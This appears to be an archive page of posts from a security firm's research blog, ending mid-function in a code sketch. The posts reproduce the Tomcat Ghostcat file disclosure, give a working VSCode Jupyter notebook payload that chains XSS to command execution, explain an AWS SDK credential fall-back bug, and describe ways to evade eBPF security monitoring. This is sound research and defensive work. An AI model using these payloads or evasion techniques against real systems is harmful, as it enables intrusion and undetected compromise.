AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol, especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to efficiently manage the network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below:

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and how it is implemented in some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potentially discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, this is a rudimentary fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz arbitrary elements within the packet.

With minor tuning, AJPFuzzer can also be used to quickly reproduce the Ghostcat vulnerability. In fact, we’ve successfully reproduced the attack by sending a crafted forwardrequest message including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the disclosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86
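The hex dump of the 'Send Body Chunk' response above can be decoded by hand: container-to-server packets start with the bytes "AB", followed by a two-byte big-endian payload length, a one-byte message type (3 for Send Body Chunk), a two-byte chunk length and the chunk itself. The Go sketch below parses exactly those bytes; the function name is made up for the example, and it is not part of libajp13 or AJPFuzzer.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// sendBodyChunk is the AJP13 prefix code for a Send Body Chunk message.
const sendBodyChunk = 3

// samplePacket holds the 32 bytes shown in the hex dump above.
var samplePacket = []byte{
	0x41, 0x42, 0x00, 0x1C, 0x03, 0x00, 0x18, 0x3C,
	0x68, 0x65, 0x6C, 0x6C, 0x6F, 0x3E, 0x64, 0x6F,
	0x79, 0x65, 0x6E, 0x73, 0x65, 0x63, 0x3C, 0x2F,
	0x68, 0x65, 0x6C, 0x6C, 0x6F, 0x3E, 0x0A, 0x00,
}

// parseSendBodyChunk extracts the body chunk from a single
// container-to-server AJP13 packet.
func parseSendBodyChunk(pkt []byte) ([]byte, error) {
	if len(pkt) < 4 {
		return nil, errors.New("packet too short for AJP header")
	}
	if pkt[0] != 'A' || pkt[1] != 'B' {
		return nil, errors.New("missing AB magic bytes")
	}
	payloadLen := int(binary.BigEndian.Uint16(pkt[2:4]))
	if len(pkt) < 4+payloadLen {
		return nil, errors.New("truncated payload")
	}
	payload := pkt[4 : 4+payloadLen]
	if len(payload) < 3 {
		return nil, errors.New("payload too short for a body chunk")
	}
	if payload[0] != sendBodyChunk {
		return nil, fmt.Errorf("unexpected message type %d", payload[0])
	}
	chunkLen := int(binary.BigEndian.Uint16(payload[1:3]))
	if len(payload) < 3+chunkLen {
		return nil, errors.New("truncated chunk")
	}
	return payload[3 : 3+chunkLen], nil
}

func main() {
	chunk, err := parseSendBodyChunk(samplePacket)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	fmt.Printf("%q\n", chunk) // prints "<hello>doyensec</hello>\n"
}
```

Here the payload length is 0x001C (28 bytes) and the chunk length is 0x0018 (24 bytes), which matches the leaked file content plus the trailing terminator byte.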

The server AJP connector will receive an AJP message with the following structure:

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret

Recruiting Security Researchers Remotely

2022-11-09T00:00:00+01:00

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process of a given candidate, we want to get to know someone better. We want to understand their motivations for changing the workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

Knowledge of the English language for applicants who are not native speakers
Professionalism - although people come from different cultures, professionalism is international
Professional experience that indicates the candidate has the background to be successful in the relevant role with us
General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, the academic knowledge necessary to pass our code review challenge is similar (but not limited) to what you’d find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview lasts about 45 minutes, during which we ask questions that help us understand the candidate’s skillset and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there or perhaps why someone missed a particular, easy to detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend that candidates feel comfortable with topics similar to those covered at the Portswigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior to attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview but rather, more of a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that come from the lack of knowledge versus the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, which is only one working day, total. So, if the candidate is reactive, the entire recruitment process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Visual Studio Code Jupyter Notebook RCE

2022-10-27T00:00:00+02:00

I spent a few hours over the past weekend looking into the exploitation of this Visual Studio Code .ipynb Jupyter Notebook bug discovered by Justin Steven in August 2021.

Justin discovered a Cross-Site Scripting (XSS) vulnerability affecting the VSCode built-in support for Jupyter Notebook (.ipynb) files.

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src=x onerror='console.log(1)'>"}
        }
      ]
    }
  ]
}

His analysis details the issue and shows a proof of concept which reads arbitrary files from disk and then leaks their contents to a remote server, however it is not a complete RCE exploit.

I could not find a way to leverage this XSS primitive to achieve arbitrary code execution, but someone more skilled with Electron exploitation may be able to do so. […]

Given our focus on ElectronJs (and many other web technologies), I decided to look into potential exploitation avenues.

As the first step, I took a look at the overall design of the application in order to identify the configuration of each BrowserWindow/BrowserView/Webview in use by VSCode. With the help of ElectroNG, it is possible to observe that the application uses a single BrowserWindow with nodeIntegration:on.

This BrowserWindow loads content using the vscode-file protocol, which is similar to the file protocol. Unfortunately, our injection occurs in a nested sandboxed iframe as shown in the following diagram:

In particular, our sandbox iframe is created using the following attributes:

allow-scripts allow-same-origin allow-forms allow-pointer-lock allow-downloads

By default, sandbox makes the browser treat the iframe as if it was coming from another origin, even if its src points to the same site. Thanks to the allow-same-origin attribute, this limitation is lifted. As long as the content loaded within the webview is also hosted on the local filesystem (within the app folder), we can access the top window. With that, we can simply execute code using something like top.require('child_process').exec('open /System/Applications/Calculator.app');

So, how do we place our arbitrary HTML/JS content within the application install folder?

Alternatively, can we reference resources outside that folder?

The answer comes from a recent presentation I watched at the latest Black Hat USA 2022 briefings. In exploiting CVE-2021-43908, TheGrandPew and s1r1us use a path traversal to load arbitrary files outside of the VSCode installation path.

vscode-file://vscode-app/Applications/Visual Studio Code.app/Contents/Resources/app/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/somefile.html

Similarly to their exploit, we can attempt to leverage a postMessage reply to leak the path of the current user directory. In fact, our payload can be placed inside the malicious repository, together with the Jupyter Notebook file that triggers the XSS.

After a couple of hours of trial-and-error, I discovered that we can obtain a reference of the img tag triggering the XSS by forcing the execution during the onload event.

With that, all of the ingredients are ready and I can finally assemble the final exploit.

var apploc = '/Applications/Visual Studio Code.app/Contents/Resources/app/'.replace(/ /g, '%20');
var repoloc;
window.top.frames[0].onmessage = event => {
    if(event.data.args.contents && event.data.args.contents.includes('<base href')){  
        var leakloc = event.data.args.contents.match('<base href=\"(.*)\"')[1];
        var repoloc = leakloc.replace('https://file%2B.vscode-resource.vscode-webview.net','vscode-file://vscode-app'+apploc+'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..');
        setTimeout(async()=>console.log(repoloc+'poc.html'), 3000)
        location.href=repoloc+'poc.html';
    }
};
window.top.postMessage({target: window.location.href.split('/')[2],channel: 'do-reload'}, '*');

To deliver this payload inside the .ipynb file we still need to overcome one last limitation: the current implementation results in malformed JSON. The injection happens within a JSON file (double-quoted) and our JavaScript payload contains quoted strings as well as double-quotes used as a delimiter for the regular expression that is extracting the path.

After a bit of tinkering, the easiest solution involves the backtick ` character instead of the quote for all JS strings.

The final pocimg.ipynb file looks like:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src='a445fff1d9fd4f3fb97b75202282c992.png' onload='var apploc = `/Applications/Visual Studio Code.app/Contents/Resources/app/`.replace(/ /g, `%20`);var repoloc;window.top.frames[0].onmessage = event => {if(event.data.args.contents && event.data.args.contents.includes(`<base href`)){var leakloc = event.data.args.contents.match(`<base href=\"(.*)\"`)[1];var repoloc = leakloc.replace(`https://file%2B.vscode-resource.vscode-webview.net`,`vscode-file://vscode-app`+apploc+`..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..`);setTimeout(async()=>console.log(repoloc+`poc.html`), 3000);location.href=repoloc+`poc.html`;}};window.top.postMessage({target: window.location.href.split(`/`)[2],channel: `do-reload`}, `*`);'>"}
        }
      ]
    }
  ]
}

By opening a malicious repository with this file, we can finally trigger our code execution.

The built-in Jupyter Notebook extension opts out of the protections given by the Workspace Trust feature introduced in Visual Studio Code 1.57, hence no further user interaction is required. For the record, this issue was fixed in VScode 1.59.1 and Microsoft assigned CVE-2021-26437 to it.

The Danger of Falling to System Role in AWS SDK Client

2022-10-18T00:00:00+02:00

Introduction to the series

When it comes to Cloud Security, the first questions usually asked are:

How is the infrastructure configured?
Are there any public buckets?
Are the VPC networks isolated?
Does it use proper IAM settings?

As application security engineers, we think that there are more interesting and context-related questions such as:

Which services provided by the cloud vendor are used?
Among the used services, which ones are directly integrated within the web platform logic?
How is the web application using such services?
How are they combined to support the internal logic?
Is the usage of services ever exposed or reachable by the end-user?
Are there any unintended behaviors caused by cloud services within the web platform?

By answering these questions, we usually find bugs.

Today we introduce the “CloudSecTidbits” series to share ideas and knowledge about such questions.

CloudSec Tidbits is a blogpost series showcasing interesting bugs found by Doyensec during cloud security testing activities. We’ll focus on times when the cloud infrastructure is properly configured, but the web application fails to use the services correctly.

Each blogpost will discuss a specific vulnerability resulting from an insecure combination of web and cloud related technologies. Every article will include an Infrastructure as Code (IaC) laboratory that can be easily deployed to experiment with the described vulnerability.

Tidbit # 1 - The Danger of Falling to System Role in AWS SDK Client

Amazon Web Services offers a comprehensive SDK to interact with their cloud services.

Let’s first examine how credentials are configured. The AWS SDKs require users to pass access / secret keys in order to authenticate requests to AWS. Credentials can be specified in different ways, depending on the different use cases.

When the AWS client is initialized without directly providing the credential’s source, the AWS SDK acts using a clearly defined logic. The AWS SDK uses a different credential provider chain depending on the base language. The credential provider chain is an ordered list of sources where the AWS SDK will attempt to fetch credentials from. The first provider in the chain that returns credentials without an error will be used.

For example, the SDK for the Go language will use the following chain:

1) Environment variables
2) Shared credentials file
3) If the application uses ECS task definition or RunTask API operation, IAM role for tasks
4) If the application is running on an Amazon EC2 instance, IAM role for Amazon EC2

The code snippet below shows how the SDK retrieves the first valid credential provider:

Source: aws-sdk-go/aws/credentials/chain_provider.go

// Retrieve returns the credentials value or error if no provider returned
// without error.
//
// If a provider is found it will be cached and any calls to IsExpired()
// will return the expired state of the cached provider.
func (c *ChainProvider) Retrieve() (Value, error) {
	var errs []error
	for _, p := range c.Providers {
		creds, err := p.Retrieve()
		if err == nil {
			c.curr = p
			return creds, nil
		}
		errs = append(errs, err)
	}
	c.curr = nil

	var err error
	err = ErrNoValidProvidersFoundInChain
	if c.VerboseErrors {
		err = awserr.NewBatchError("NoCredentialProviders", "no valid providers in chain", errs)
	}
	return Value{}, err
}

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Insecure AWS SDK Client Initialization In User Facing Functionalities - The Import From S3 Case

By testing several web platforms, we noticed that data import from external cloud services is an often recurring functionality. For example, some web platforms allow data import from third-party cloud storage services (e.g., AWS S3).

In this specific case, we will focus on a vulnerability identified in a web application that was using the AWS SDK for Go (v1) to implement an “Import Data From S3” functionality.

The user was able to make the platform fetch data from S3 by providing the following inputs:

S3 bucket name - Import from public source case;

OR
S3 bucket name + AWS Credentials - Import from private source case;

The code paths were handled by a function similar to the following structure:

func getObjectsList(sess *session.Session, cfg *aws.Config, bucket_name string) (*s3.ListObjectsV2Output, error) {

	// initialize or re-initialize the S3 client with the given configuration
	S3svc := s3.New(sess, cfg)

	// list the objects in the user-supplied bucket
	objectsList, err := S3svc.ListObjectsV2(&s3.ListObjectsV2Input{
		Bucket: aws.String(bucket_name),
	})

	return objectsList, err
}

func importData(req *http.Request) (success bool, err error) {

	srcConfig := &aws.Config{
		Region: &config.Config.AWS.Region,
	}

	// all of the following values are controlled by the end-user
	req.ParseForm()
	bucket_name := req.Form.Get("bucket_name")
	accessKey := req.Form.Get("access_key")
	secretKey := req.Form.Get("secret_key")
	region := req.Form.Get("region")

	session_init, err := session.NewSession()
	if err != nil {
		return false, err
	}

	aws_config := &aws.Config{
		Region: aws.String(region),
	}

	if len(accessKey) > 0 {
		aws_config.Credentials = credentials.NewStaticCredentials(accessKey, secretKey, "")
	} else {
		aws_config.Credentials = credentials.AnonymousCredentials
	}

	objectList, err := getObjectsList(session_init, aws_config, bucket_name)
    
...

Despite using credentials.AnonymousCredentials when the user was not providing keys, the function had an interesting code path when ListObjectsV2 returned errors:

...
if err != nil {
		// on any AWS error, drop the configured credentials and retry
		if _, isAWSError := err.(awserr.Error); isAWSError {
			aws_config.Credentials = nil
			getObjectsList(session_init, aws_config, bucket_name)
		}
}

The error handling was setting aws_config.Credentials = nil and trying again to list the objects in the bucket.

Looking at aws_config.Credentials = nil

Under those circumstances, the credentials provider chain will be used and eventually the instance’s IAM role will be assumed. In our case, the automatically retrieved credentials had full access to internal S3 buckets.
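To make the fall-back easier to picture, here is a minimal, self-contained sketch that models the behavior with plain Go types. It does not use the AWS SDK: Creds, Provider, resolve and defaultChain are hypothetical names invented for this illustration, and the chain contents are an assumption about a host with no environment keys but with an instance role attached.

```go
package main

import (
	"errors"
	"fmt"
)

// Creds is a hypothetical stand-in for the SDK's credentials value.
type Creds struct {
	Source string // where the credentials came from
	Anon   bool   // true when requests would be sent unsigned
}

// Provider mimics one entry of a credential provider chain.
type Provider func() (Creds, error)

// resolve models the behavior described above: explicit credentials win,
// while a nil value silently falls through to the provider chain.
func resolve(explicit *Creds, chain []Provider) (Creds, error) {
	if explicit != nil {
		return *explicit, nil
	}
	for _, p := range chain {
		if c, err := p(); err == nil {
			return c, nil
		}
	}
	return Creds{}, errors.New("no valid providers in chain")
}

// defaultChain is an illustrative chain (assumption): the first two
// providers fail and the instance role is the first one to succeed.
func defaultChain() []Provider {
	return []Provider{
		func() (Creds, error) { return Creds{}, errors.New("env: not set") },
		func() (Creds, error) { return Creds{}, errors.New("shared file: not found") },
		func() (Creds, error) { return Creds{Source: "instance-role"}, nil },
	}
}

func main() {
	anon := &Creds{Source: "anonymous", Anon: true}

	first, _ := resolve(anon, defaultChain())
	fmt.Println("first attempt uses:", first.Source)

	// The retry path from the case study: credentials reset to nil.
	retry, _ := resolve(nil, defaultChain())
	fmt.Println("retry uses:", retry.Source)
}
```

The point of the sketch is that nothing in the retry path asks for the instance role explicitly. It is picked up only because nil means "use whatever the chain finds first".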

The Simple Deduction

If internal S3 bucket names are exposed to the end-user by the platform (e.g., via network traffic), the user can use them as input for the “import from S3” functionality and inspect their content directly in the UI.

Reading internal bucket names list extracted from Burp Suite history

In fact, it is not uncommon to see internal bucket names in an application’s traffic as they are often used for internal data processing. In conclusion, providing internal bucket names resulted in them being fetched from the import functionality and added to the platform user’s data.

Different Client Credentials Initialization, Different Outcomes

AWS SDK clients require a Session object containing a Credential object for the initialization.

Described below are the three main ways to set the credentials needed by the client:

NewStaticCredentials

Within the credentials package, the NewStaticCredentials function returns a pointer to a new Credentials object wrapping static credentials.

Client initialization example with NewStaticCredentials:

package testing

import (
	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
	"github.com/aws/aws-sdk-go/aws/session"
)

// sess is named differently from the imported session package to avoid a name clash
var sess = session.Must(session.NewSession(&aws.Config{
	Credentials: credentials.NewStaticCredentials("AKIA….", "Secret", "Session"),
	Region:      aws.String("us-east-1"),
}))

Note: The credentials should not be hardcoded in code. Instead retrieve them from a secure vault at runtime.

{ nil | Unspecified } Credentials Object

If the session client is initialized without specifying a credential object, the credential provider chain will be used. Likewise, if the Credentials object is directly initialized to nil, the same behavior will occur.

Client initialization example without Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Region:      aws.String("us-west-2"),
})))

Client initialization example with a nil valued Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Credentials: <nil_object>,
		Region:      aws.String("us-west-2"),
})))

Outcome: Both initialization methods will result in relying on the credential provider chain. Hence, the credentials (probably very privileged) retrieved from the chain will be used. As shown in the aforementioned “Import From S3” case study, not being aware of such behavior led to the exfiltration of internal buckets.

AnonymousCredentials

The right function for the right tasks ;)

AWS SDK for Go API Reference is here to help:

“AnonymousCredentials is an empty Credential object that can be used as dummy placeholder credentials for requests that do not need to be signed. This AnonymousCredentials object can be used to configure a service not to sign requests when making service API calls. For example, when accessing public S3 buckets.”

svc := s3.New(session.Must(session.NewSession(&aws.Config{
  Credentials: credentials.AnonymousCredentials,
})))
// Access public S3 buckets.

Basically, the AnonymousCredentials object is just an empty Credential object:

// source: https://github.com/aws/aws-sdk-go/blob/main/aws/credentials/credentials.go#L60

// AnonymousCredentials is an empty Credential object that can be used as
// dummy placeholder credentials for requests that do not need to be signed.
//
// These Credentials can be used to configure a service not to sign requests
// when making service API calls. For example, when accessing public
// s3 buckets.
//
//     svc := s3.New(session.Must(session.NewSession(&aws.Config{
//       Credentials: credentials.AnonymousCredentials,
//     })))
//     // Access public S3 buckets.
var AnonymousCredentials = NewStaticCredentials("", "", "")

For cloud security auditors

The vulnerability could also be found in the usage of other AWS services.

While auditing cloud-driven web platforms, look for every code path involving an AWS SDK client initialization.

For every code path answer the following questions:

Is the code path directly reachable from an end-user input point (feature or exposed API)?

e.g., AWS credentials taken from the user settings page within the platform or a user submits an AWS public resource to have it fetched/modified by the platform.
How are the client’s credentials initialized?
- credential provider chain - Look for the machine owned role in the chain
  - Is there a fall-back condition? Look if the end-user can reach that code path with some inputs
  - If it is used by default, go on
  - Look for the role’s permissions
- aws.Config structure as input parameter - Look for the passed role’s permissions
Can users abuse the functionality to make the platform use the privileged credentials on their behalf and point to private resources within the AWS account?

e.g., “import from S3” functionality abused to import the infrastructure’s private buckets

For developers

Use anonymous credentials (credentials.AnonymousCredentials in the AWS SDK for Go, AnonymousAWSCredentials in the AWS SDK for Java) to configure the AWS SDK client when dealing with public resources.

From the official AWS documentation:

Using anonymous credentials will result in requests not being signed before sending them to the service. Any service that does not accept unsigned requests will return a service exception in this case.

In case of user provided credentials being used to integrate with other cloud services, the platform should avoid implementing fall-back to system role patterns. Ensure that the user provided credentials are correctly set to avoid ending up with aws.Config.Credentials = nil because it would result in the client using the credentials provider chain → System role.
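As a rough illustration of the "no fall-back" advice, the sketch below decides the credential mode from user input only and fails closed on errors. It is a simplified model rather than SDK code: Mode, chooseMode and importFromBucket are hypothetical names, and the list callback merely stands in for the real S3 call.

```go
package main

import (
	"errors"
	"fmt"
)

// Mode names which credentials a request is allowed to use.
type Mode int

const (
	Anonymous Mode = iota // unsigned requests for public resources
	UserKeys              // static keys supplied by the end-user
)

// ErrIncompleteKeys is returned when only one of the two keys is provided.
var ErrIncompleteKeys = errors.New("access key and secret key must both be provided")

// chooseMode decides the credential mode from user input only.
// There is deliberately no branch that yields "unspecified" credentials,
// so the caller can never end up on the provider chain.
func chooseMode(accessKey, secretKey string) (Mode, error) {
	switch {
	case accessKey == "" && secretKey == "":
		return Anonymous, nil
	case accessKey != "" && secretKey != "":
		return UserKeys, nil
	default:
		return Anonymous, ErrIncompleteKeys
	}
}

// importFromBucket is a hypothetical import routine; list stands in for
// the real bucket listing call.
func importFromBucket(bucket, accessKey, secretKey string, list func(Mode, string) error) error {
	mode, err := chooseMode(accessKey, secretKey)
	if err != nil {
		return err
	}
	if err := list(mode, bucket); err != nil {
		// Fail closed: report the error instead of retrying with other credentials.
		return fmt.Errorf("import of %q failed: %w", bucket, err)
	}
	return nil
}

func main() {
	denied := errors.New("AccessDenied")
	calls := 0
	err := importFromBucket("internal-bucket", "", "", func(m Mode, b string) error {
		calls++
		return denied
	})
	fmt.Println(err, "| listing attempts:", calls)
}
```

In a real integration, the Anonymous mode would map to credentials.AnonymousCredentials and the UserKeys mode to credentials.NewStaticCredentials, both of which appear earlier in this post.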

Hands-On IaC Lab

Stay tuned for the next episode!

On Bypassing eBPF Security Monitoring

2022-10-11T00:00:00+02:00

There are many security solutions available today that rely on the Extended Berkeley Packet Filter (eBPF) features of the Linux kernel to monitor kernel functions. Such a paradigm shift in the latest monitoring technologies is being driven by a variety of reasons. Some of them are motivated by performance needs in an increasingly cloud-dominated world, among others. The Linux kernel always had kernel tracing capabilities such as kprobes (2.6.9), ftrace (2.6.27 and later), perf (2.6.31), or uprobes (3.5), but with BPF it’s finally possible to run kernel-level programs on events and consequently modify the state of the system, without needing to write a kernel module. This has dramatic implications for any attacker looking to compromise a system and go undetected, opening new areas of research and application. Nowadays, eBPF-based programs are used for DDoS mitigations, intrusion detection, container security, and general observability.

In 2021 Teleport introduced a new feature called Enhanced Session Recording to close some monitoring gaps in Teleport’s audit abilities. All issues reported have been promptly fixed, mitigated or documented as described in their public Q4 2021 report. Below you can see an illustration of how we managed to bypass eBPF-based controls, along with some ideas on how red teams or malicious actors could evade these new intrusion detection mechanisms. These techniques can be generally applied to other targets while attempting to bypass any security monitoring solution based on eBPF:

A few words on how eBPF works
Common shortcomings & potential bypasses (here be dragons)

A few words on how eBPF works

Extended BPF programs are written in a high-level language and compiled into eBPF bytecode using a toolchain. A user mode application loads the bytecode into the kernel using the bpf() syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical: eBPF exposes a path for unprivileged users to execute in ring 0. Since allowing unprivileged users to run code in the kernel is a ripe attack surface, several pieces of research in the past focused on local privilege escalation (LPE), which we won’t cover in this blog post. After the program is loaded, the user mode application attaches it to a hook point, and the program is executed whenever that hook point is hit (that is, whenever the corresponding event occurs). The program can also be JIT compiled into native assembly instructions in some cases. User mode applications can interact with, and get data from, the eBPF program running in the kernel using eBPF maps and eBPF helper functions.

Common shortcomings & potential bypasses (here be dragons)

1. Understand which events are caught

While eBPF is fast (much faster than auditd), there are plenty of interesting areas that can’t be reasonably instrumented with BPF due to performance reasons. Depending on what the security monitoring solution wants to protect the most (e.g., network communication vs executions vs filesystem operations), there could be areas where excessive probing could lead to a performance overhead pushing the development team to ignore them. This depends on how the endpoint agent is designed and implemented, so carefully auditing the code security of the eBPF program is paramount.

1.1 Execution bypasses

By way of example, a simple monitoring solution could decide to hook only the execve system call. Contrary to popular belief, multiple ELF-based Unix-like kernels don’t need a file on disk to load and run code, even if they usually require one. One way to achieve this is by using a technique called reflective loading. Reflective loading is an important post-exploitation technique usually used to avoid detection and execute more complex tools in locked-down environments. The man page for execve() states: “execve() executes the program pointed to by filename…”, and goes on to say that “the text, data, bss, and stack of the calling process are overwritten by that of the program loaded”. This overwriting doesn’t necessarily constitute something that the Linux kernel must have a monopoly over, unlike filesystem access, or any number of other things. Because of this, the execve() system call can be mimicked in userland with minimal difficulty. Creating a new process image is therefore a simple matter of:

cleaning out the address space;
checking for, and loading, the dynamic linker;
loading the binary;
initializing the stack;
determining the entry point and
transferring control of execution.

By following these six steps, a new process image can be created and run. Since this technique was initially reported in 2004, the process has been refined and streamlined by off-the-shelf (OTS) post-exploitation tools. As anticipated, an eBPF program hooking execve would not be able to catch this, since this custom userland exec would effectively replace the existing process image within the current address space with a new one. In this, userland exec mimics the behavior of the system call execve(). However, because it operates in userland, the kernel process structures which describe the process image remain unchanged.

Other system calls may go unmonitored and decrease the detection capabilities of the monitoring solution. Some of these are clone, fork, vfork, creat, or execveat.

Another potential bypass may be present if the BPF program is naive and trusts the execve syscall argument referencing the complete path of the file that is being executed. An attacker could create symbolic links of Unix binaries in different locations and execute them - thus tampering with the logs.
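The symlink trick is easy to reproduce. The sketch below is a userland illustration only (an assumption about how an agent might post-process events, not how any specific product works): it creates a file named curl and a symlink to it with an innocuous name, then compares the name a naive logger would record from the raw path argument with the name obtained after resolving symlinks. The file names and the demo helper are hypothetical.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// demo creates a file named "curl" and a symlink to it named "backup-job"
// in a temporary directory. It returns the base name taken from the raw
// path argument and the base name obtained after resolving symlinks.
func demo() (argName, resolvedName string, err error) {
	dir, err := os.MkdirTemp("", "symlink-demo")
	if err != nil {
		return "", "", err
	}
	defer os.RemoveAll(dir)

	target := filepath.Join(dir, "curl")
	if err := os.WriteFile(target, []byte("#!/bin/sh\n"), 0o755); err != nil {
		return "", "", err
	}
	alias := filepath.Join(dir, "backup-job")
	if err := os.Symlink(target, alias); err != nil {
		return "", "", err
	}

	// Resolve every symbolic link in the path before deciding what ran.
	resolved, err := filepath.EvalSymlinks(alias)
	if err != nil {
		return "", "", err
	}
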